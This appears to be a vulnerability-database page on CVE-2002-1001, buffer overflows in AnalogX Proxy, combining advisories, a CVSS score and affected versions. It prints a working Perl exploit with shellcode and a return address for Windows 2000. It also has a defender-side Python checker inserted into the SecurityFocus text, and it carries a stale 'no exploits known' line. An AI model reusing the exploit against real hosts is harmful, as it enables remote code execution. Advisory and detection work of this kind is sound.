CVE-2002-1001
CVSS 7.5
Published: 2002-10-04 00:00:00
Revised: 2008-09-05 16:29:30

[Original] Buffer overflows in AnalogX Proxy before 4.12 allow remote attackers to cause a denial of service and possibly execute arbitrary code via (1) a long HTTP request to TCP port 6588 or (2) a SOCKS 4A request to TCP port 1080 with a long DNS hostname.


[CNNVD] AnalogX Proxy Socks4A Remote Buffer Overflow Vulnerability (CNNVD-200210-029)

AnalogX Proxy is a proxy program that lets multiple machines share Internet access through a single machine on a LAN.
AnalogX Proxy mishandles malformed SOCKS4A requests; a remote attacker can exploit this flaw to carry out a buffer overflow attack.
An attacker can send a SOCKS4A request whose hostname field contains 140 or more bytes to TCP port 1080, on which AnalogX Proxy listens, causing an access-violation application error in AnalogX Proxy. Dismissing the error dialog by hand terminates the process; if the dialog is not dismissed, repeated requests of this kind can cause the service to stop responding.
Carefully crafted hostname-field data may allow the attacker to execute arbitrary instructions on the system with the privileges of the AnalogX Proxy process.

- CVSS (base score)

CVSS score: 7.5 [HIGH]
Confidentiality impact: PARTIAL [information disclosure is likely]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: PARTIAL [performance may degrade or access to resources may be interrupted]
Access complexity: LOW [no access restrictions on exploitation]
Attack vector: [--]
Authentication: NONE [exploitation requires no authentication]

- CPE (affected platforms and products)

cpe:/a:analogx:proxy:4.0.1  AnalogX AnalogX Proxy 4.0.1
cpe:/a:analogx:proxy:4.0.3  AnalogX AnalogX Proxy 4.0.3
cpe:/a:analogx:proxy:4.0.6  AnalogX AnalogX Proxy 4.0.6
cpe:/a:analogx:proxy:4.0.4  AnalogX AnalogX Proxy 4.0.4
cpe:/a:analogx:proxy:4.0.5  AnalogX AnalogX Proxy 4.0.5
cpe:/a:analogx:proxy:4.0.2  AnalogX AnalogX Proxy 4.0.2
cpe:/a:analogx:proxy:4.0    AnalogX AnalogX Proxy 4.0
cpe:/a:analogx:proxy:4.0.7  AnalogX AnalogX Proxy 4.0.7

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1001
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-1001
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200210-029
(official data source) CNNVD

- Other links and resources

http://www.securityfocus.com/bid/5139
(VENDOR_ADVISORY)  BID  5139
http://www.securityfocus.com/bid/5138
(VENDOR_ADVISORY)  BID  5138
http://www.iss.net/security_center/static/9456.php
(VENDOR_ADVISORY)  XF  analogx-proxy-socks4a-bo(9456)
http://www.iss.net/security_center/static/9455.php
(VENDOR_ADVISORY)  XF  analogx-proxy-http-bo(9455)
http://www.analogx.com/contents/download/network/proxy.htm
(UNKNOWN)  CONFIRM  http://www.analogx.com/contents/download/network/proxy.htm
http://archives.neohapsis.com/archives/bugtraq/2002-07/0006.html
(UNKNOWN)  BUGTRAQ  20020701 Foundstone Advisory - Buffer Overflow in AnalogX Proxy (fwd)

- Vulnerability information

AnalogX Proxy Socks4A Remote Buffer Overflow Vulnerability
High severity  Boundary condition error
2002-10-04 00:00:00 2006-09-25 00:00:00
Remote

- Advisories and patches

Vendor patch:
AnalogX
-------
The vendor has not yet released a patch or upgrade; users of this software are advised to watch the vendor's homepage for the latest version:

http://www.analogx.com

- Vulnerability information (21589)

AnalogX Proxy 4.0 Socks4A Buffer Overflow Vulnerability (EDBID:21589)
windows remote
2002-07-01 Verified
0 Kanatoko
source: http://www.securityfocus.com/bid/5138/info

AnalogX Proxy is prone to a buffer overflow condition when attempting to handle malformed SOCKS4A requests (via TCP port 1080). This may be exploited to create a denial of service condition or to potentially execute arbitrary instructions with the privileges of the AnalogX Proxy process. 

#!/usr/local/bin/perl

#-----------------------------------------------------------
# AnalogX Proxy Version 4.10 exploit for Japanese Windows 2000 Pro (SP2)
# written by Kanatoko <anvil@jumperz.net>
# http://www.jumperz.net/
# thanx to: hsj (http://hsj.shadowpenguin.org/)
#-----------------------------------------------------------
use Socket;

$connect_host = "socks.example.com";
$port = 1080;
$iaddr = inet_aton($connect_host) || die "Host Resolve Error.\n";
$sock_addr = pack_sockaddr_in($port,$iaddr);
socket(SOCKET,PF_INET,SOCK_STREAM,0) || die "Socket Error.\n";
connect(SOCKET,$sock_addr) || die "Connect Error\n";
select(SOCKET); $|=1; select(STDOUT);   # unbuffered writes to the socket

# egg written by UNYUN (http://www.shadowpenguin.org/)
# 57bytes
$egg  = "\xEB\x27\x8B\x34\x24\x33\xC9\x33\xD2\xB2";
$egg .= "\x0B\x03\xF2\x88\x0E\x2B\xF2\xB8\xAF\xA7";
$egg .= "\xE6\x77\xB1\x05\xB2\x04\x2B\xE2\x89\x0C";
$egg .= "\x24\x2B\xE2\x89\x34\x24\xFF\xD0\x90\xEB";
$egg .= "\xFD\xE8\xD4\xFF\xFF\xFF";
$egg .= "notepad.exe";

# SOCKS4A header: VN=4, CD=1 (CONNECT), DSTPORT=25, DSTIP=0.0.0.1 (SOCKS4A marker)
$buf  = "\x04\x01\x00\x19\x00\x00\x00\x01";
# USERID field, NUL-terminated
$buf .= "A" x 32;
$buf .= $egg;
$buf .= "\x00";
# DOMAIN (hostname) field: 150 bytes in total, above the 140-byte figure in the advisory
$buf .= "A" x 144;

# JMP ESP in user32.dll( Japanese Windows 2000 Pro SP2 ) : 0x77DF492B
# If you use English Windows 2000, try 0x77E2492B
$buf .= "\x2B\x49\xdf\x77";

# JMP +0x22
$buf .= "\xEB\x22";
$buf .= "\x00";

print SOCKET $buf;

- Vulnerability information

3661
AnalogX Proxy Long URL (320) Overflow
Remote / Network Access Input Manipulation
Loss of Integrity

- Vulnerability description

AnalogX Proxy contains a flaw that allows a local network user to execute arbitrary code on the proxy server. The flaw is due to the proxy not properly filtering long URI requests. By supplying a carefully crafted URI greater than 320 characters to the proxy on port 6588, it will overflow a buffer and allow the malicious user to execute arbitrary code.

- Timeline

2003-05-16 Unknown
Unknown Unknown

- Solution

Upgrade to version 4.12 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- References

- Vulnerability author

- Vulnerability information

AnalogX Proxy Web Proxy Buffer Overflow Vulnerability
Boundary Condition Error 5139
Yes No
2002-07-01 12:00:00 2009-07-11 02:56:00
Discovery of this issue is credited to "Foundstone Labs" <labs@foundstone.com>.

- Affected program versions

AnalogX Proxy 4.0.7
AnalogX Proxy 4.0.6
AnalogX Proxy 4.0.5
AnalogX Proxy 4.0.4
AnalogX Proxy 4.0.3
AnalogX Proxy 4.0.2
AnalogX Proxy 4.0.1
AnalogX Proxy 4.0

- Vulnerability discussion

AnalogX Proxy is prone to a buffer overflow condition when attempting to handle malformed HTTP proxy requests (via TCP port 6588). This may be exploited to create a denial of service condition or to potentially execute arbitrary instructions with the privileges of the AnalogX Proxy process.

- Exploit

The following was provided as an example of how to reproduce this issue:

Sending an HTTP proxy request to the target system on TCP port 6588 consisting of a single space character, followed by 320 or more non-space characters, followed by two carriage-return line feeds causes a read access violation in the application.
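Added example, not code from the advisories, Exploit-DB or AnalogX: a defender-side checker that parses a SOCKS4A request and an HTTP proxy request line and flags the two overlong-input patterns this page describes for port 1080 (hostname of 140 or more bytes) and port 6588 (a request token of 320 or more characters). The function names and the sample requests are my own constructions; only the two thresholds come from the advisories.

```python
# Thresholds the advisories state: 140+ byte SOCKS4A hostname, 320+ char HTTP request token.
SOCKS4A_HOSTNAME_LIMIT = 140
HTTP_TOKEN_LIMIT = 320


def parse_socks4a(data: bytes):
    """Parse a SOCKS4/4A request into (userid, hostname); hostname is None for plain SOCKS4.

    Wire layout: VN(1) CD(1) DSTPORT(2) DSTIP(4) USERID NUL [DOMAIN NUL].
    DOMAIN is present only when DSTIP is 0.0.0.x with x != 0 (the SOCKS4A marker).
    """
    if len(data) < 9 or data[0] != 4:
        raise ValueError("not a SOCKS4 request")
    dstip, rest = data[4:8], data[8:]
    userid, sep, rest = rest.partition(b"\x00")
    if not sep:
        raise ValueError("USERID not NUL-terminated")
    hostname = None
    if dstip[:3] == b"\x00\x00\x00" and dstip[3] != 0:
        hostname, sep, _ = rest.partition(b"\x00")
        if not sep:
            raise ValueError("DOMAIN not NUL-terminated")
    return userid, hostname


def socks4a_is_suspicious(data: bytes) -> bool:
    """Flag a SOCKS4A request whose hostname reaches the crash threshold (or is unparseable)."""
    try:
        _, hostname = parse_socks4a(data)
    except ValueError:
        return True  # malformed framing on the SOCKS port is worth an alert on its own
    return hostname is not None and len(hostname) >= SOCKS4A_HOSTNAME_LIMIT


def http_request_is_suspicious(data: bytes) -> bool:
    """Flag a request line with any whitespace-separated token of 320+ chars.

    Covers both published descriptions: a lone space then 320+ non-space chars,
    and a proxied URI longer than 320 characters."""
    request_line = data.split(b"\r\n", 1)[0]
    return any(len(tok) >= HTTP_TOKEN_LIMIT for tok in request_line.split())


# Constructed samples (not captured traffic): one benign and one overlong request of each kind.
SOCKS4A_HEADER = b"\x04\x01\x00\x50\x00\x00\x00\x01"  # VN=4 CD=CONNECT DSTPORT=80 DSTIP=0.0.0.1
BENIGN_SOCKS4A = SOCKS4A_HEADER + b"user\x00" + b"www.example.com\x00"
OVERLONG_SOCKS4A = SOCKS4A_HEADER + b"user\x00" + b"A" * 140 + b"\x00"
BENIGN_HTTP = b"GET http://www.example.com/ HTTP/1.0\r\n\r\n"
OVERLONG_HTTP = b" " + b"A" * 320 + b"\r\n\r\n"
```

The checks are per-request length tests, so they are suitable for a proxy-side filter or an IDS rule on the two listening ports, not as proof that a given request would actually corrupt memory.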

Currently we are not aware of any exploits for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.

- Solution

It has been reported that the vendor has acknowledged this issue and will be offering solutions on their website.

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.

- References